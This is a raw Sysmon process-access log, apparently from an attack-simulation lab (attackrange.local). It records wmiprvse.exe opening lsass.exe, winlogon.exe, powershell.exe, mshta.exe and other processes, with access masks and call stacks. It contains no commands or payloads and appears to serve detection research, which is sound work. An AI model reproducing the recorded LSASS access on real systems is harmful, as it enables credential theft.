15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025556Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025555Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5362-6008-5B06-00000000A301}6336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025554Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025553Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025552Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025551Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025550Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025549Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025548Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025547Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025546Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025545Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025544Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025543Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025542Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025541Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025540Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025539Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025538Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025537Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program 